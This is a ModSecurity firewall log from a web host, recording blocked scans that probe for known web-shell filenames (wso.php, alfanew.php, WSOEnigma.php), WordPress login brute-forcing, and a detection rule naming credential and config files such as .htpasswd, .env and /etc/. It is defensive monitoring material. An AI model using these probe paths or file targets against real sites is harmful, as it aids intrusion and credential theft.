[Tue May 26 13:48:52.711432 2026] [security2:error] [pid 560287:tid 560532] [client 20.205.111.246:1055] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/goods.php"] [unique_id "ahVXbJmX5s6sDS3wJVcJTQAAAPI"]
[Tue May 26 13:48:52.951620 2026] [security2:error] [pid 560287:tid 560443] [client 202.76.168.172:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXbJmX5s6sDS3wJVcJSgAAAJ0"]
[Tue May 26 13:48:53.027286 2026] [security2:error] [pid 555743:tid 555879] [client 15.235.169.50:60815] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/shell.php"] [unique_id "ahVXbcjqAquC0YaxQjCt8gAAARA"]
[Tue May 26 13:48:53.424609 2026] [security2:error] [pid 560287:tid 560423] [client 20.205.111.246:1615] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/g.php"] [unique_id "ahVXbZmX5s6sDS3wJVcJYwAAAIo"]
[Tue May 26 13:48:53.625329 2026] [security2:error] [pid 555743:tid 555989] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXbcjqAquC0YaxQjCt9gAAAX4"]
[Tue May 26 13:48:53.840473 2026] [security2:error] [pid 555743:tid 555918] [client 15.235.169.50:60946] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/ID3/wp-login.php"] [unique_id "ahVXbcjqAquC0YaxQjCt-QAAATc"]
[Tue May 26 13:48:53.848515 2026] [security2:error] [pid 560287:tid 560456] [client 20.206.67.134:1332] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mosykay.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahVXbZmX5s6sDS3wJVcJeQAAAKk"]
[Tue May 26 13:48:54.014125 2026] [security2:error] [pid 560287:tid 560475] [client 107.189.7.156:19246] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.7.189.107.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "support.mosykay.com"] [uri "/index.php"] [unique_id "ahVXbZmX5s6sDS3wJVcJegAAALs"]
[Tue May 26 13:48:54.154071 2026] [security2:error] [pid 560287:tid 560431] [client 20.205.111.246:1561] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/hplfuns.php"] [unique_id "ahVXbpmX5s6sDS3wJVcJhgAAAJI"]
[Tue May 26 13:48:54.306180 2026] [security2:error] [pid 555743:tid 555963] [client 15.235.169.50:61120] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/jetpack.php"] [unique_id "ahVXbsjqAquC0YaxQjCuCQAAAWQ"]
[Tue May 26 13:48:54.775350 2026] [security2:error] [pid 560287:tid 560461] [client 15.235.169.50:61195] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/alfanew.php"] [unique_id "ahVXbpmX5s6sDS3wJVcJqQAAAK4"]
[Tue May 26 13:48:54.880675 2026] [security2:error] [pid 560287:tid 560549] [client 20.205.111.246:1567] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/ioxi-o.php"] [unique_id "ahVXbpmX5s6sDS3wJVcJrQAAAQE"]
[Tue May 26 13:48:55.262322 2026] [security2:error] [pid 560287:tid 560546] [client 15.235.169.50:61257] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wso.php"] [unique_id "ahVXb5mX5s6sDS3wJVcJwQAAAP4"]
[Tue May 26 13:48:55.272935 2026] [security2:error] [pid 560287:tid 560514] [client 172.86.66.156:57939] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.66.86.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVXb5mX5s6sDS3wJVcJtgAAAOA"], referer: https://www.cagmedya.com/kayseri-web-tasarim/
[Tue May 26 13:48:55.273040 2026] [security2:error] [pid 560287:tid 560514] [client 172.86.66.156:57939] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVXb5mX5s6sDS3wJVcJtgAAAOA"], referer: https://www.cagmedya.com/kayseri-web-tasarim/
[Tue May 26 13:48:55.381211 2026] [security2:error] [pid 560287:tid 560502] [client 107.189.7.156:19158] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.7.189.107.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.support.mosykay.com"] [uri "/index.php"] [unique_id "ahVXb5mX5s6sDS3wJVcJzQAAANQ"]
[Tue May 26 13:48:55.457440 2026] [security2:error] [pid 560287:tid 560296] [remote 74.7.241.58:33016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVXb5mX5s6sDS3wJVcJ0AAAxQg"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/vi
[Tue May 26 13:48:55.520880 2026] [security2:error] [pid 560287:tid 560428] [client 20.206.67.134:1318] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mosykay.com"] [uri "/wsongpor.php"] [unique_id "ahVXb5mX5s6sDS3wJVcJ0QAAAI8"], referer: www.google.com
[Tue May 26 13:48:55.619329 2026] [security2:error] [pid 560287:tid 560512] [client 20.205.111.246:1556] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/in.php"] [unique_id "ahVXb5mX5s6sDS3wJVcJ3AAAAN4"]
[Tue May 26 13:48:55.689406 2026] [security2:error] [pid 555743:tid 555879] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXb8jqAquC0YaxQjCuGwAAARA"]
[Tue May 26 13:48:55.737660 2026] [security2:error] [pid 555743:tid 555928] [client 15.235.169.50:61381] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/plugins/seoplugins/db.php"] [unique_id "ahVXb8jqAquC0YaxQjCuKgAAAUE"]
[Tue May 26 13:48:56.201065 2026] [security2:error] [pid 555743:tid 555905] [client 15.235.169.50:61436] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/"] [unique_id "ahVXcMjqAquC0YaxQjCuQAAAASo"]
[Tue May 26 13:48:56.372475 2026] [security2:error] [pid 560287:tid 560548] [client 20.205.111.246:1633] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/info.php"] [unique_id "ahVXcJmX5s6sDS3wJVcKCAAAAQA"]
[Tue May 26 13:48:56.427082 2026] [security2:error] [pid 560287:tid 560423] [client 107.189.7.156:19232] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.7.189.107.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahVXcJmX5s6sDS3wJVcKCwAAAIo"]
[Tue May 26 13:48:56.658186 2026] [security2:error] [pid 555743:tid 555873] [client 107.189.7.156:19208] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.7.189.107.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahVXcMjqAquC0YaxQjCuTwAAAQo"]
[Tue May 26 13:48:56.691303 2026] [security2:error] [pid 560287:tid 560456] [client 15.235.169.50:61512] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/classwithtostring.php"] [unique_id "ahVXcJmX5s6sDS3wJVcKGAAAAKk"]
[Tue May 26 13:48:56.903651 2026] [security2:error] [pid 555743:tid 555995] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXcMjqAquC0YaxQjCuTAAAAYQ"]
[Tue May 26 13:48:56.956240 2026] [security2:error] [pid 555743:tid 555998] [client 107.189.7.156:19452] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at ARGS:filesrc. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahVXcMjqAquC0YaxQjCuUgAAAYc"]
[Tue May 26 13:48:57.061739 2026] [security2:error] [pid 560287:tid 560443] [client 20.205.111.246:6244] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/inputs.php"] [unique_id "ahVXcZmX5s6sDS3wJVcKMAAAAJ0"]
[Tue May 26 13:48:57.172192 2026] [security2:error] [pid 560287:tid 560494] [client 15.235.169.50:61583] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/user/about.php"] [unique_id "ahVXcZmX5s6sDS3wJVcKMgAAAM0"]
[Tue May 26 13:48:57.589043 2026] [security2:error] [pid 560287:tid 560419] [client 129.222.147.134:1154] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXcZmX5s6sDS3wJVcKRwAAAIY"]
[Tue May 26 13:48:57.589208 2026] [security2:error] [pid 560287:tid 560419] [client 129.222.147.134:1154] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXcZmX5s6sDS3wJVcKRwAAAIY"]
[Tue May 26 13:48:57.652462 2026] [security2:error] [pid 555743:tid 555928] [client 15.235.169.50:61659] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/js/about.php"] [unique_id "ahVXccjqAquC0YaxQjCuYwAAAUE"]
[Tue May 26 13:48:57.771280 2026] [security2:error] [pid 555743:tid 555891] [client 20.205.111.246:6332] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/item.php"] [unique_id "ahVXccjqAquC0YaxQjCuZwAAARw"]
[Tue May 26 13:48:58.103302 2026] [security2:error] [pid 560287:tid 560460] [client 107.189.7.156:19282] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.7.189.107.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahVXcpmX5s6sDS3wJVcKbgAAAK0"]
[Tue May 26 13:48:58.120128 2026] [security2:error] [pid 555743:tid 555886] [client 15.235.169.50:61726] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-header.php"] [unique_id "ahVXcsjqAquC0YaxQjCubwAAARc"]
[Tue May 26 13:48:58.517914 2026] [security2:error] [pid 555743:tid 555917] [client 20.205.111.246:1922] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/k.php"] [unique_id "ahVXcsjqAquC0YaxQjCudQAAATY"]
[Tue May 26 13:48:58.585984 2026] [security2:error] [pid 555743:tid 555890] [client 15.235.169.50:61796] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/plugins/hello.php"] [unique_id "ahVXcsjqAquC0YaxQjCueAAAARs"]
[Tue May 26 13:48:58.773919 2026] [security2:error] [pid 560287:tid 560457] [client 107.189.7.156:19304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at ARGS:filesrc. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahVXcpmX5s6sDS3wJVcKiwAAAKo"]
[Tue May 26 13:48:59.049365 2026] [security2:error] [pid 560287:tid 560493] [client 15.235.169.50:61914] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/themes/about.php"] [unique_id "ahVXc5mX5s6sDS3wJVcKlgAAAMw"]
[Tue May 26 13:48:59.063328 2026] [security2:error] [pid 560287:tid 560495] [client 107.189.7.156:19304] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.7.189.107.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahVXc5mX5s6sDS3wJVcKmAAAAM4"]
[Tue May 26 13:48:59.234476 2026] [security2:error] [pid 560287:tid 560472] [client 20.205.111.246:6344] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/license.php"] [unique_id "ahVXc5mX5s6sDS3wJVcKpAAAALg"]
[Tue May 26 13:48:59.284417 2026] [security2:error] [pid 560287:tid 560509] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXcpmX5s6sDS3wJVcKjQAAANs"]
[Tue May 26 13:48:59.285828 2026] [security2:error] [pid 560287:tid 560304] [remote 95.216.117.13:52772] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahVXc5mX5s6sDS3wJVcKmQAA8xA"]
[Tue May 26 13:48:59.527207 2026] [security2:error] [pid 555743:tid 555979] [client 15.235.169.50:61977] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/WSOEnigma.php"] [unique_id "ahVXc8jqAquC0YaxQjCukwAAAXQ"]
[Tue May 26 13:48:59.905279 2026] [security2:error] [pid 560287:tid 560515] [client 20.205.111.246:1049] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/load.php"] [unique_id "ahVXc5mX5s6sDS3wJVcKvAAAAOE"]
[Tue May 26 13:48:59.995478 2026] [security2:error] [pid 560287:tid 560442] [client 15.235.169.50:62039] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/wso112233.php"] [unique_id "ahVXc5mX5s6sDS3wJVcKvwAAAJw"]
[Tue May 26 13:49:00.289396 2026] [security2:error] [pid 560287:tid 560469] [client 216.244.66.241:45618] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahVXdJmX5s6sDS3wJVcKzAAAALU"]
[Tue May 26 13:49:00.289521 2026] [security2:error] [pid 560287:tid 560469] [client 216.244.66.241:45618] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahVXdJmX5s6sDS3wJVcKzAAAALU"]
[Tue May 26 13:49:00.416592 2026] [security2:error] [pid 560287:tid 560535] [client 216.244.66.241:45634] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahVXdJmX5s6sDS3wJVcKzQAAAPU"]
[Tue May 26 13:49:00.416746 2026] [security2:error] [pid 560287:tid 560535] [client 216.244.66.241:45634] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahVXdJmX5s6sDS3wJVcKzQAAAPU"]
[Tue May 26 13:49:00.466540 2026] [security2:error] [pid 560287:tid 560435] [client 15.235.169.50:62096] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/"] [unique_id "ahVXdJmX5s6sDS3wJVcK0QAAAJY"]
[Tue May 26 13:49:00.614452 2026] [security2:error] [pid 560287:tid 560443] [client 20.205.111.246:1563] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/manager.php"] [unique_id "ahVXdJmX5s6sDS3wJVcK2wAAAJ0"]
[Tue May 26 13:49:00.910316 2026] [security2:error] [pid 560287:tid 560481] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXdJmX5s6sDS3wJVcK1wAAAMA"]
[Tue May 26 13:49:00.957296 2026] [security2:error] [pid 560287:tid 560467] [client 15.235.169.50:62169] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/1.php"] [unique_id "ahVXdJmX5s6sDS3wJVcK8QAAALQ"]
[Tue May 26 13:49:01.310361 2026] [security2:error] [pid 560287:tid 560442] [client 20.205.111.246:6349] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/media.php"] [unique_id "ahVXdZmX5s6sDS3wJVcLBAAAAJw"]
[Tue May 26 13:49:01.451495 2026] [security2:error] [pid 555743:tid 555899] [client 15.235.169.50:62231] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/index.php"] [unique_id "ahVXdcjqAquC0YaxQjCutQAAASQ"]
[Tue May 26 13:49:01.918699 2026] [security2:error] [pid 560287:tid 560521] [client 15.235.169.50:62304] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/s.php"] [unique_id "ahVXdZmX5s6sDS3wJVcLHQAAAOc"]
[Tue May 26 13:49:01.994451 2026] [security2:error] [pid 560287:tid 560505] [client 20.205.111.246:1958] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/mar.php"] [unique_id "ahVXdZmX5s6sDS3wJVcLHgAAANc"]
[Tue May 26 13:49:02.395776 2026] [security2:error] [pid 560287:tid 560437] [client 15.235.169.50:62386] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/wp-login.php"] [unique_id "ahVXdpmX5s6sDS3wJVcLNgAAAJg"]
